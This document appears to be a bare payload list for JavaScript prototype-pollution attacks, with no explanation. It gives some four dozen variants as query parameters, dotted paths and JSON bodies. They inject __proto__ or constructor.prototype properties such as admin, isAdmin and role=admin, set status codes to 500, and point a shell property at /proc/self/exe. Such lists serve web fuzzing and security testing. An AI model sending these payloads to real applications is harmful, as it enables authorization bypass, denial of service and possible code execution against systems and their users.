__proto__
__proto__[admin]=true
__proto__[constructor]
__proto__[evilProperty]=evilValue
__proto__[isAdmin]=true
__proto__[role]=admin
__proto__[shell]=/proc/self/exe
__proto__[status]=500
__proto__[statusCode]=500
__proto__[test]=test
__proto__.admin=true
__proto__.constructor
__proto__.constructor.prototype.admin=true
__proto__.isAdmin=true
__proto__.polluted=true
__proto__.role=admin
__proto__.shell=/proc/self/exe
__proto__.test=test
constructor.prototype.admin=true
constructor.prototype.isAdmin=true
constructor.prototype.polluted=true
constructor.prototype.role=admin
constructor.prototype.test=test
constructor[prototype][admin]=true
constructor[prototype][isAdmin]=true
constructor[prototype][polluted]=true
constructor[prototype][role]=admin
constructor[prototype][test]=test
{"__proto__":{"admin":true}}
{"__proto__":{"constructor":{"prototype":{"admin":true}}}}
{"__proto__":{"isAdmin":true}}
{"__proto__":{"polluted":true}}
{"__proto__":{"role":"admin"}}
{"__proto__":{"status":500}}
{"__proto__":{"test":"test"}}
{"constructor":{"prototype":{"admin":true}}}
{"constructor":{"prototype":{"isAdmin":true}}}
{"constructor":{"prototype":{"polluted":true}}}
{"constructor":{"prototype":{"role":"admin"}}}
?__proto__[admin]=true
?__proto__[isAdmin]=true
?__proto__[polluted]=true
?__proto__[role]=admin
?constructor.prototype.admin=true
?constructor[prototype][admin]=true
